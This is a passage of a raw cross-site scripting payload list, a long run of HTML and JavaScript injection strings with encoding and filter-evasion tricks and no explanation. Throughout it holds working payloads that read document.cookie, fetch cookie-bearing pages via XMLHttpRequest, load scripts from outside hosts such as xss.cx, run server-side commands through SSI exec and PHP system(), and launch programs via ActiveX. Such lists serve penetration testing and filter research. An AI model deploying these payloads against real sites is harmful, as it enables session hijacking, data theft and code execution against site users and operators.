,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	 >X</a <a href="data:application/x-x509-user-cert;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">click</a> <a href="data:text/html,%3cscript>confirm (1)</script>" >hello <a href="data:text/html;base64,PHN2Zy萨9vbmxv晕YWQ<>>9YWxlc>>>nQoMSk+">click</a> "/><a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a <a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a <a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a> <a href="data:text/html,<script>eval(name)</script>" target="confirm(1)">click</a> <a href=``explorer.exe``> <a href="invalid:1" id=x name=y>test</a> "/><a href="invalid:2" id=x name=y>test</a> <a href="javascript:window['confirm'](1)">aa</a> <a href="jAvAsCrIpT:confirm(1)">X</a> <a href="jAvAsCrIpT:confirm(1)">X</a> <a href="javas	cri
pt:confirm(1)">test</a> <a href="//javascript:99999999/1?/YOU_MUST_HIT_RETURN<svg onload=confirm(1)>/:0">Right click open in new tab</a> "/><a href=javascript:confirm(document.cookie)>Click Here</a> "><a href=javascript:confirm(document.cookie)>Click Here</a> <a href=javascript:confirm(document.cookie)>Click-XSS</a> "><a href="javascript:\u0061le%72t(1)"><button> <a href="javascript:\u0061le%72t(1)"><button> <a href="javascript:'hello'" rel="sidebar">x</a> <a href="javascript:void(0)" onmouseover=
javascript:confirm(1)
>X</a> <a href=javascript&.x3A;confirm&(x28;1&)x29;//=>clickme a href="j&#x26#x41;vascript:confirm%252831337%2529">Hello</a> <a href=``mspaint.exe``> <a href=``notepad.exe``> <a href=``shell:System``> <a href='vbscript:"\"&confirm(1)''"'> <a href="x:confirm(1)" id="test">click</a><script>eval(test+'')</script> <a href=``xss.cx``> <a id="x" href='http://adspecs.yahoo.com/adspecs.php' target="close(/*grabcookie(1)*/)">CLICK</a><script>onblur=function(){confirm(4)}x.click();</script> <a rel="noreferrer" href="//xss.cx">click</a> <a target=_blank href="data:text/html,<script>confirm(opener.document.body.innerHTML)</script>">clickme in Opera/FF</a> <a target="x" href="xssme?xss=%3Cscript%3EaddEventListener%28%22DOMFrameContentLoaded%22,%20function%28e%29%20{e.stopPropagation%28%29;},%20true%29;%3C/script%3E%3Ciframe%20src=%22data:text/html,%253cscript%253eObject.defineProperty%28top,%20%27MyEvent%27,%20{value:%20Object,%20configurable:%20true}%29;function%20y%28%29%20{confirm%28top.Safe.get%28%29%29;};event%20=%20new%20Object%28%29;event.type%20=%20%27click%27;event.isTrusted%20=%20true;y%28event%29;%253c/script%253e%22%3E%3C/iframe%3E <a target="x" href="xssme?xss=<script>find('cookie'); var doc = getSelection().getRangeAt(0).startContainer.ownerDocument; console.log(doc); var xpe = new XPathEvaluator(); var nsResolver = xpe.createNSResolver(doc); var result = xpe.evaluate('//script/text()', doc, nsResolver, 0, null); confirm(result.iterateNext().data.match(/cookie = '(.*?)'/)[1])</script> <a target="x" href="xssme?xss=<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe src=%22javascript:parent.x(window);%22></iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', '.', true);xhr.onload = function() { confirm(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); <a target="x" href="xssme?xss=<script>var cl=Components;var fcc=String.fromCharCode;doc=cl.lookupMethod(top, fcc(100,111,99,117,109,101,110,116) )( );cl.lookupMethod(doc,fcc(119,114,105,116,101))(doc.location.hash)</script>#<iframe src=data:text/html;base64,PHNjcmlwdD5ldmFsKGF0b2IobmFtZSkpPC9zY3JpcHQ%2b name=ZG9jPUNvbXBvbmVudHMubG9va3VwTWV0aG9kKHRvcC50b3AsJ2RvY3VtZW50JykoKTt2YXIgZmlyZU9uVGhpcyA9ICBkb2MuZ2V0RWxlbWVudEJ5SWQoJ3NhZmUxMjMnKTt2YXIgZXZPYmogPSBkb2N1bWVudC5jcmVhdGVFdmVudCgnTW91c2VFdmVudHMnKTtldk9iai5pbml0TW91c2VFdmVudCggJ2NsaWNrJywgdHJ1ZSwgdHJ1ZSwgd2luZG93LCAxLCAxMiwgMzQ1LCA3LCAyMjAsIGZhbHNlLCBmYWxzZSwgdHJ1ZSwgZmFsc2UsIDAsIG51bGwgKTtldk9iai5fX2RlZmluZUdldHRlcl9fKCdpc1RydXN0ZWQnLGZ1bmN0aW9uKCl7cmV0dXJuIHRydWV9KTtmdW5jdGlvbiB4eChjKXtyZXR1cm4gdG9wLlNhZmUuZ2V0KCl9O2FsZXJ0KHh4KGV2T2JqKSk></iframe> <a"'%0A`= +%20>;test<a"'%0A`= +%20>?test<a"'%0A`= +%20>;#test<a"'%0A`= +%20>; <a"'%0A`= +%20>;test<a"'%0A`= +%20>?test<a"'%0A`= +%20>;&x="><img src=x onerror=prompt(1);>#"><img src=x onerror=prompt(1);>test<a"'%0A`= +%20>; <a href=[�]"� onmouseover=prompt(1)//">XYZ</a about://xss.cx <a/href[\0C]=ja	vasc	ript:confirm(1)>XXX</a> <a/href=data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==>ClickMe</a> <a$href="data:text/html,%style=""3cscript>confirm((1)</sstyle=""cript>" onerror=>hello <a/href=java	script:confirm%28/XSS/%29>click</a> <a/href="javascript: javascript:prompt(1)"><input type="X"> <a/onmouseover[\x0b]=location='\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x61\x6 C\x65\x72\x74\x28\x30\x29\x3B'>xss <a [\x0B]onmosemove=confirm('\Done\')> <a[\x0B] onmouseover =location=’jav\x41script\x3aconfirm\x28″ZDresearch”\x29′>ZDresearch <body language=vbs onload=confirm-1 <body language=vbs onload=confirm-1 <body language=vbs onload=confirm-1 "><body language=vbs onload=window.location='http://xss.cx'> <body onload='vbs:Set x=CreateObject("Msxml2.XMLHTTP"):x.open"GET",".":x.send:MsgBox(x.responseText)'> <body scroll=confirm(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus> <body/onload=<!-->
confirm(1)> <body/onload=<!-->
confirm(1)> "<body/onload=<!-->
confirm(1);prompt(/XSS/.source)>" "\"><body/onload=<!-->
confirm(1);prompt(/XSS/.source)>", <body/onload=<!-->
confirm(1);prompt(/XSS/.source)> ><body/onload=<!-->
confirm(1);prompt(/XSS/.source)> <button autofocus onfocus=confirm(2)> <button onclick="window.open('http://xss.cx/::Error138 ');">CLICKME "<button>'><img src=x onerror=confirm(0);></button>" <button>'><img src=x onerror=confirm(0);></button> charset=utf- '`"><*chr*script>log(*num*)</script> <command onmouseover="javascript:confirm(0);">Save // <*datahtmlelements* data=about:blank background=about:blank action=about:blank type=image/gif src=about:blank href=about:blank *dataevents*="customLog('*datahtmlelements* *dataevents*')"></*datahtmlelements*> <*datahtmlelements* *dataevents*="javascript:parent.customLog('*datahtmlelements* *dataevents*')"></*datahtmlelements*> <*datahtmlelements* *datahtmlattributes*="javascript:parent.customLog('*datahtmlelements* *datahtmlattributes*')"></*datahtmlelements*> <div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="confirm(1)">x</button>?f <div contextmenu=x>right-click<menu id=x onshow=confirm(1)> <div id="confirm(2)" style="x:expression(eval)(id)"> <div onmouseover='confirm(1)'>DIV</div> <div onmouseover='confirm(1)'>DIV</div> <div style="color:rgb(''�x:expression(confirm(URL=1))"></div> <div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="confirm(1)">x</button> <%div%20style=xss:expression(prompt(1))> <div/onmouseover='confirm(1)'> style="x:"> <div/onmouseover='confirm(1)'> style="x:"> <div/style=content:url(data:image/svg+xml);visibility:visible onmouseover=confirm(1)>Mouse Over</div> <div/style="width:expression(confirm(1))">X</div> <embed code="http://xss.cx/xss.swf" allowscriptaccess=always></embed> <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> <!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://xss.cx/xss.js></SCRIPT>'"--> exp/*<XSS STYLE='no\xss:noxss("*//*"); </font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style> for(i=10;i>1;i--)confirm(i);new ActiveXObject("WScript.shell").Run('calc.exe',1,true); <form action='data:text/html,<script>confirm(1)</script>'><button>CLICK <form action='java	scri	pt:confirm(1)'><button>CLICK <form action="javas	cript:confirm(1)" method="get"><input type="submit" value="Submit"></form> <form id="myform" value="" action=javascript	:eval(document.getElementById('myform').elements[0].value)><textarea>confirm(1)</textarea><input type="submit" value="Absenden"></form> <form name=location > <form><a href="javascript:\u0061lert(1)">X <form/action=ja	vascr	ipt:confirm(document.cookie)><button/type=submit> <form/action=ja	vascr	ipt:confirm(document.cookie)><button/type=submit> <form/action=javascript:eval(setTimeout(confirm(1)))><input/type=submit> //<form/action=javascript:confirm(document.cookie)><input/type='submit'>// <form><button formaction=javascript:confirm(1)>CLICKME <form><iframe 	  src="javascript:confirm(1)" 	;> <form><input type=submit formaction=//xss.cx><textarea name=x> <form><isindex formaction="javascript:confirm(1)" <form><textarea onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'> <frameset><frame/src=//xss.cx> > > http://www.google<script .com>confirm(document.location)</script http://www.<script abc>setTimeout('confirm(1)',1)</script .com> http://www.<script>confirm(1)</script .com <!--[if WindowsEdition]><script>confirm(location);</script><![endif]--> <!--[if<img src=x:x onerror=confirm(5)//]--> <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> <iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															%28
																1
																	%29></iframe> ? <iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe> <iframe %00 src="	javascript:prompt(1)	"%00> <iframe id=%22ifra%22 src=%22/%22></iframe> <script>ifr = document.getElementById('ifra'); ifr.contentDocument.write(%22<scr%22 %2b %22ipt>top.foo = Object.defineProperty</scr%22 %2b %22ipt>%22); foo(window, 'Safe', {value:{}}); foo(Safe, 'get', {value:function() { return document.cookie }}); confirm(Safe.get());</script> <iframe onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { confirm(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); <iframe src=/ onload=eval(unescape(this.name.replace(/\/g,null))) name=fff%253Dnew%2520this.contentWindow.window.XMLHttpRequest%2528%2529%253Bfff.open%2528%2522GET%2522%252C%2522xssme2%2522%2529%253Bfff.onreadystatechange%253Dfunction%2528%2529%257Bif%2520%2528fff.readyState%253D%253D4%2520%2526%2526%2520fff.status%253D%253D200%2529%257Bconfirm%2528fff.responseText%2529%253B%257D%257D%253Bfff.send%2528%2529%253B></iframe> <iframe src="" onmouseover="confirm(document.cookie)"> <iframe src="#" style=width:exp/**/ressi/**/on(confirm(1))> <iframe src=%22404%22 onload=%22content.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){confirm(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe> <iframe src=%22404%22 onload=%22frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){confirm(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe> <iframe src=%22404%22 onload=%22self.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){confirm(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe> <iframe src=%22404%22 onload=%22top.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){confirm(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe> <iframe src="data:D,<script>confirm(top.document.body.innerHTML)</script>"> <iframe src="data:message/rfc822,Content-Type: text/html;%0aContent-Transfer-Encoding: quoted-printable%0a%0a=3CSCRIPT=3Econfirm(document.location)=3C/SCRIPT=3E"></iframe> <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> <iframe srcdoc='<body onload=prompt(1)>'> <iframe srcdoc='<svg/onload=confirm(3)>'> <iframe srcdoc="<svg/onload=confirm(domain)>"> <iframe src="http://xss.cx?x=<iframe name=x></iframe>"></iframe><a href="http://xss.ms" target=x id=x></a><script>window.onload=function(){x.click()}</script> <iframe src=`http://xssme.html5sec.org/?xss=<iframe onload=%22xhr=new XMLHttpRequest();xhr.open('GET','http://html5sec.org/xssme2',true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){confirm(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();%22>`> <iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															28
																1
																	%29></iframe> <iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe> <iframe src=javascript:confirm(document.location)> <iframe src="javascript:'<script src=http://xss.cx ></script>'"></iframe> "><iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"> <iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"> <iframe width=0 height=0 src="javascript:confirm(1)"> <iframe/%00/ src=javaSCRIPT:confirm(1) "><iframe%20src="http://google.com"%%203E iframe.contentWindow.location.constructor.prototype <iframe><iframe src=javascript:confirm(4)></iframe> <iframe/name="if(0){\u0061lert(1)}else{\u0061lert(1)}"/onload="eval(name)";> <iframe/name="if(0){\u0061lert(1)}else{\u0061lert(1)}"/onload="eval(name)";> "><iframe/onreadystatechange=confirm(1) <iframe/onreadystatechange=confirm(1) <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> "><iframe/src \/\/onload = prompt(1) <iframe/src \/\/onload = prompt(1) <iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> <iframe/src="data:text/html,<svg onload=confirm(1)>"> /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/> <iframe/src=j	av	as	cri	pt	:co	nfir	m	(		1	)> <iframe/src='javascript:if(null==null){javascript:0?1:confirm(1);}'> <iframe/src='javascript:if(null==null){javascript:0?1:confirm(1);}'> <!--[if]><script>confirm(1)</script --> <img language=vbs src=<b onerror=confirm#1/1#> "><img src="/" =_=" title="onerror='prompt(1)'"> <img src="/" =_=" title="onerror='prompt(1)'"> <img src ?itworksonchrome?\/onerror = confirm(1) <img src ?itworksonchrome?\/onerror = confirm(1)??? “><img src= onerror=confirm(1)> <img src=//\ onload=confirm(1)> <img src=`%00`
 onerror=confirm(1)
 <img src=1 onerror=Function("aler"+"t(documen"+"t.domain)")()> "]<img src=1 onerror=confirm(1)> /#<img src=1 onerror=javascript:confirm(3)> <img src=a onerror=eval(String.fromCharCode(97,108,101,114,116,40,39,67,104,101,97,116,115,111,110,39,41))> <img src=http://www.google.fr/images/srpr/logo3w.png onload=confirm(this.ownerDocument.cookie) width=0 height= 0 /> # "><img src=javascript:while([{}]);> <img src=javascript:while([{}]);> <img/ src//'onerror/''/=confirm(1)//'> <img src=test.jpg?value=">Yes, we are still inside a tag!"> <img src=x on*chr*Error="javascript:log(*num*)"/> <img src=x on*chr*Error="javascript:log(*num*)"/> <img src=x onerror=URL='javascript:confirm(1)'> "\"><img src=\"x\" onerror=\"confirm(0)\"/>", ><img src=\"x\" onerror=\"confirm(0)\"/> <img src=x onerror='confirm(domain+/ -- /+cookie)'>"> <img src=x onerror='confirm(domain+/ -- /+cookie)'>"> "><img src=x onerror=confirm('x') />] "><img src=x onerror=confirm(1); ... "><img src=x onerror=prompt(1);> "><img src=x onerror=prompt(document.location);>#"><img src=x onerror=prompt(document.location);> "><img src=x onerror=prompt("xss");>#"><img src=x onerror=prompt("xss");> "><img src=x onerror=window.open('https://www.google.com/');> "<img src=x onerror=x.onerror=confirm(1);prompt(2);confirm(/XSS/.source);prompt(String.fromCharCode(88,83,83))>" "\"><img src=x onerror=x.onerror=confirm(1);prompt(2);confirm(/XSS/.source);prompt(String.fromCharCode(88,83,83))>", <img src=x onerror=x.onerror=confirm(1);prompt(2);confirm(/XSS/.source);prompt(String.fromCharCode(88,83,83))> ><img src=x onerror=x.onerror=confirm(1);prompt(2);confirm(/XSS/.source);prompt(String.fromCharCode(88,83,83))> "<img src=x onerror=x.onerror=m='%22%3E%3Cimg%20src%3Dx%20onerror%3Dx.onerror%3Dprompt%28/xss/.source%29%3E';d=unescape(m);document.write(d);prompt(String.fromCharCode(88,83,83))>" <img src=x onerror=x.onerror=m='%22%3E%3Cimg%20src%3Dx%20onerror%3Dx.onerror%3Dprompt%28/xss/.source%29%3E';d=unescape(m);document.write(d);prompt(String.fromCharCode(88,83,83))> "/><img src=x onerror=x.onerror=prompt(0)> "\"/><img src=x onerror=x.onerror=prompt(0)>" "/><img src=x onerror=x.onerror=prompt(/xss/.source);confirm(0);confirm(1)> "\"/><img src=x onerror=x.onerror=prompt(/xss/.source);confirm(0);confirm(1)>" <![<img src=x:x onerror=`confirm(2)//`]--> <img src=xx: onerror=confirm(document.location)> "><img src="xx:x" alt="``onerror=confirm(1)"><script>document.body.innerHTML+=''</script> <img src="xx:x" alt="``onerror=confirm(1)"><script>document.body.innerHTML+=''</script> "<img src=`xx:xx` onerror=confirm(/XSS/.source);confirm(1)>" "\"><img src=`xx:xx` onerror=confirm(/XSS/.source);confirm(1)>", <img src=`xx:xx` onerror=confirm(/XSS/.source);confirm(1)> ><img src=`xx:xx` onerror=confirm(/XSS/.source);confirm(1)> <img src=xx:xx onerror=window[['logChr*chr*']](*num*)> <img src=`xx:xx`onerror=confirm(1)> <img src=`xx:xx`onerror=confirm(1)> <img/	  src=`~` onerror=prompt(1)> >"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;confirm(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)> "<img/src=` onerror=confirm(1)>" <img/src=` onerror=confirm(1)> "><--`<img/src=` onerror=confirm(1)> --!> <--`<img/src=` onerror=confirm(1)> --!> <img/src=%00 id=confirm(1) onerror=eval(id) <img/src=`%00` /id=confirm(1) /onerror=eval(id) <img/src=`%00` onerror=this.onerror=confirm(1) <img/src=@  onerror = prompt('1') <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1) <img/src=x alt=confirm(1) onmouseover=eval(alt)> <img/src=x alt=confirm(1) onmouseover=eval(alt)> "\"><imgsrc=x onerror=confirm.onerror=confirm(1)>", ><imgsrc=x onerror=confirm.onerror=confirm(1)> <img/src="x"/id="javascript"/name=":confirm"/alt="(1)"/onerror="eval(id + name + alt)"> =’”><img/src=”x”onerror=eval(String.fromCharCode(119,105,110,100,111,119,46,108,111,99,97,108,83,116,111,114,97,103,101,46,115,101,116,73,116,101,109,40,39,105,100,39,44,39,34,62,60,105,109,103,47,115,114,99,61,92,34,120,92,34,111,110,101,114,114,111,114,61,97,108,101,114,116,40,49,41,62,39,41))> '><img/src="x:x"/onerror="confirm(1)"'>< innerHTML=document.title innerHTML=innerText <input autofocus onfocus=confirm(1)> <input formaction=JaVaScript:confirm(document.cookie)> <input id=x><input id=x><script>confirm(x)</script> <><input onfocus=confirm(0) autofocus <!-- <input pattern=^((a+.)a)+$ value=aaaaaaaaaaaaaaa!> <input type=hidden onformchange=confirm(1)/> <input type=hidden style=`x:expression(confirm(1))`> <input type=hidden style=`x:expression(confirm(4))`> <input type="text" name="a" <input type="text" value=`` <div/onmouseover='confirm(1)'>X</div> <input type="text" value=``<div/onmouseover='confirm(1)'>X</div> "><input value=<><iframe/src=javascript:confirm(1) <input value=<><iframe/src=javascript:confirm(1) input1=<script/&in%u2119ut1=>al%u0117rt('1')</script> <input/onmouseover="javaSCRIPT:confirm(1)" <i/onclick=URL=name> "/><isindex action="javas	cript:confirm(1)" type=image> "><isindex action="javas	cript:confirm(1)" type=image> <isindex action="javas	cript:confirm(1)" type=image> <isindex action="javas	cript:confirm(document.cookie)" type=image> <isindex formaction=javascript:confirm(1)> <label class="<% confirm(1) %>"> <li style="color:rgb(''0,0,�javascript:expression(confirm(1))">XSS</li> <link rel="import" href="//xss.cx"> <link rel=import onerror=confirm(1)> <link rel="prefetch" href="http://xss.cx"> <link rel=stylesheet href='data:,+/v8*%7bx:e+AHgAcA-ression(confirm(1))%7D' > <link%20rel="import"%20href="?bypass=<script>confirm(document.domain)</script>"> <listing><img src=x onerror=confirm(1)></listing> < < <a href="http://i.imgur.com/b7sajuK.jpg" download><a href="http://i.imgur.com/b7sajuK.jpg" download>What a cute kitty!</a></a> <img src=xx:x onerror=confirm(1)><script>document.body.innerHTML=document.body.innerText||document.body.textContent</script> <label class="<% confirm(1) %>"> </script><script>confirm(1)</script> <marquee onstart='javascript:confirm(1)'>^__^ "><marquee>confirm( `bypass :)`)</marquee> "<marquee/onstart=confirm(/XSS/.source);confirm(1)>" "\"><marquee/onstart=confirm(/XSS/.source);confirm(1)>", <marquee/onstart=confirm(/XSS/.source);confirm(1)> ><marquee/onstart=confirm(/XSS/.source);confirm(1)> <math><a xlink:href="//jsfiddle.net/t846h/">click <math><a/xlink:href=javascript:confirm(1)>click <math><a/xlink:href=javascript:eval('\141\154\145\162\164\50\61\51')>X <meta charset="x-mac-farsi">¼script ¾confirm(1)//¼/script ¾ <meta content="
 1 
; JAVASCRIPT: confirm(1)" http-equiv="refresh"/> <meta http-equiv=refresh content="0 javascript:confirm(1)"> "><meta http-equiv="refresh" content="0;javascript:confirm(1)"/> <meta http-equiv="refresh" content="0;javascript:confirm(1)"/> <meta http-equiv="refresh" content="0;javascript:confirm(1)"/>? <meta http-equiv="refresh" content="0;url=javascript:confirm(1)"> <meta http-equiv=refresh content=+.1,javascript:confirm(document.cookie)> ?movieName=";]);}catch(e){}if(!self.a)self.a=!confirm(document.domain);// <object data=%22data:text/html;base64,PHNjcmlwdD4gdmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOyB4aHIub3BlbignR0VUJywgJ2h0dHA6Ly94c3NtZS5odG1sNXNlYy5vcmcveHNzbWUyJywgdHJ1ZSk7IHhoci5vbmxvYWQgPSBmdW5jdGlvbigpIHsgYWxlcnQoeGhyLnJlc3BvbnNlVGV4dC5tYXRjaCgvY29va2llID0gJyguKj8pJy8pWzFdKSB9OyB4aHIuc2VuZCgpOyA8L3NjcmlwdD4=%22> <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object> <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>? "\"\/><object data='data:text/html;base64,PHNjcmlwdD5hbGVydCgieHNzIik8L3NjcmlwdD4='></object>" ><object data='data:text/html;base64,PHNjcmlwdD5hbGVydCgieHNzIik8L3NjcmlwdD4='></object>" <object data='data:text/xml,<script xmlns="http://www.w3.org/1999/xhtml ">confirm(1)</script>>'> "><object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">? "/><object data=javascript:\u0061le%72t(1)> <object data=javascript:\u0061le%72t(1)> "/><object type='text/x-html' data='javascript:prompt(/xss/.source);var x = prompt;x(0);x(/XSS/.source);x'></object> "<object type='text/x-html' data='javascript:prompt(/xss/.source);var x = prompt;x(0);x(/XSS/.source);x'></object>" "><object type='text/x-html' data='javascript:prompt(/xss/.source);var x = prompt;x(0);x(/XSS/.source);x'></object>", <object type='text/x-html' data='javascript:prompt(/xss/.source);var x = prompt;x(0);x(/XSS/.source);x'></object> "/><object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object> <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object> /*-->]]>%>?></object></script></title></textarea></noscript></style></xmp>'-/"///><img id="b1" src=1 onerror='$.getScript("http://xss.cx.js", function() { c(); });'>' "<option>'><button><img src=x onerror=confirm(0);></button></option>" <option>'><button><img src=x onerror=confirm(0);></button></option> "\"\/><option>'><button><img src=x onerror=confirm(1);></button></option>", ><option>'><button><img src=x onerror=confirm(1);></button></option> <p hidden?={{hidden}}>123</p> <p style="font-family:'foo&#x5c;27&#x5c;3bx:expr&#x65;ession(confirm(1))'"> ?param1=<script>prompt(9);/*¶m2=*/</script> $.parseHTML('<img src=xx:X onerror=confirm(1)>') <?php echo $_SERVER['PHP_SELF']?> </plaintext\></|\><plaintext/onmouseover=prompt(1) ?playerID=a\";))}catch(e){confirm(document.domain)}// ${@print(system($_SERVER['HTTP_USER_AGENT']))} ${@print(system(“whoami”))} <q/oncut=confirm() '/><q/oncut=open()>// <q/oncut=open()> >"><script>confirm('hi')</script>"<</a>value=""><script>confirm('hi')</script>"<"/> .replace(/.+/,eval)// <s "'"="" 000=""> "'"><s/000 "'"><s/000 "'"><s/000 "'"><s/000 <s%00c%00r%00%00ip%00t>confirm(0);</s%00c%00r%00%00ip%00t> <s[NULL]cript>confirm(1)</s[NULL]cript>'>Clickme</a> <sVg><scRipt %00>confirm(1) <<scr\0ipt/src=http://xss.cx/xss.js></script <scri%00ipt>confirm(0);</script> <scri%00pt>confirm(1);</scri%00pt> "<scri%00pt>confirm(0);</scri%00pt>" "\"><scri%00pt>confirm(0);</scri%00pt>", <scri%00pt>confirm(0);</scri%00pt> ><scri%00pt>confirm(0);</scri%00pt> <script>/* */confirm(1)/* */</script> <script> function b() { return Safe.get(); } confirm(b({type:String.fromCharCode(99,108,105,99,107),isTrusted:true})); </script> <script> function foo(elem, doc, text) { elem.onclick = function (e) { e.__defineGetter__(text[0], function () { return true }) confirm(Safe.get()); }; var event = doc.createEvent(text[1]); event.initEvent(text[2], true, true); elem.dispatchEvent(event); } </script> <img src=http://www.google.fr/images/srpr/logo3w.png onload=foo(this,this.ownerDocument,this.name.split(/,/)) name=isTrusted,MouseEvent,click width=0 height=0 /> # <script> (function (o) { function exploit(x) { if (x !== null) confirm('User cookie is ' %2B x); else console.log('fail'); } o.onclick = function (e) { e.__defineGetter__('isTrusted', function () { return true; }); exploit(Safe.get()); }; var e = document.createEvent('MouseEvent'); e.initEvent('click', true, true); o.dispatchEvent(e); })(document.getElementById('safe123')); </script> <script /*%00*/>/*%00*/confirm(1)/*%00*/</script /*%00*/ <script ~~~>confirm(0%0)</script ~~~> <script ^__^>confirm(String.fromCharCode(49))</script ^__^ '"`><script>/* **chr*log(*num*)// */</script> <script>/* **chr*/log(*num*)// */</script> <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/ <script> document.getElementById(%22safe123%22).click=function()+{confirm(Safe.get());} document.getElementById(%22safe123%22).click({'type':'click','isTrusted':true}); </script> <script> document.getElementById(%22safe123%22).setCapture(); document.getElementById(%22safe123%22).click(); </script> <script for=_ event=onerror()>confirm(/@ma1/)</script><img id=_ src=> <script for=document event=onreadystatechange>getElementById('safe123').click()</script> <script itworksinallbrowsers>/*<script* */confirm(1)</script <script itworksinallbrowsers>/*<script* */confirm(1)</script ? <script> location.href = 'data:text/html;base64,PHNjcmlwdD54PW5ldyBYTUxIdHRwUmVxdWVzdCgpO3gub3BlbigiR0VUIiwiaHR0cDovL3hzc21lLmh0bWw1c2VjLm9yZy94c3NtZTIvIix0cnVlKTt4Lm9ubG9hZD1mdW5jdGlvbigpIHsgYWxlcnQoeC5yZXNwb25zZVRleHQubWF0Y2goL2RvY3VtZW50LmNvb2tpZSA9ICcoLio/KScvKVsxXSl9O3guc2VuZChudWxsKTs8L3NjcmlwdD4='; </script> <script> logChr0x09(1); </script> <script src=>confirm(8)</script> "/><script src="data:text/javascript,confirm(1)"></script> <script src="data:text/javascript,confirm(1)"></script> "<script src='data:text/javascript,prompt(/XSS/.source);var x = prompt;x(0);x(/XSS/.source);x'></script>" "\"><script src='data:text/javascript,prompt(/XSS/.source);var x = prompt;x(0);x(/XSS/.source);x'></script>", <script src='data:text/javascript,prompt(/XSS/.source);var x = prompt;x(0);x(/XSS/.source);x'></script> ><script src='data:text/javascript,prompt(/XSS/.source);var x = prompt;x(0);x(/XSS/.source);x'></script> <script type="text/xaml"><Canvas Loaded="confirm" /></script> <script> "\ud83d\u*hex4*".match(/.*<.*/) ? log(*num*) : null; </script> <script> var xdr = new ActiveXObject(%22Microsoft.XMLHTTP%22); xdr.open(%22get%22, %22/xssme2%3Fa=1%22, true); xdr.onreadystatechange = function() { try{ var c; if (c=xdr.responseText.match(/document.cookie = '(.*%3F)'/) ) confirm(c[1]); }catch(e){} }; xdr.send(); </script> <script> var+MouseEvent=function+MouseEvent(){}; MouseEvent=MouseEvent var+test=new+MouseEvent(); test.isTrusted=true; test.type='click'; document.getElementById(%22safe123%22).click=function()+{confirm(Safe.get());} document.getElementById(%22safe123%22).click(test); </script> "/><script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); 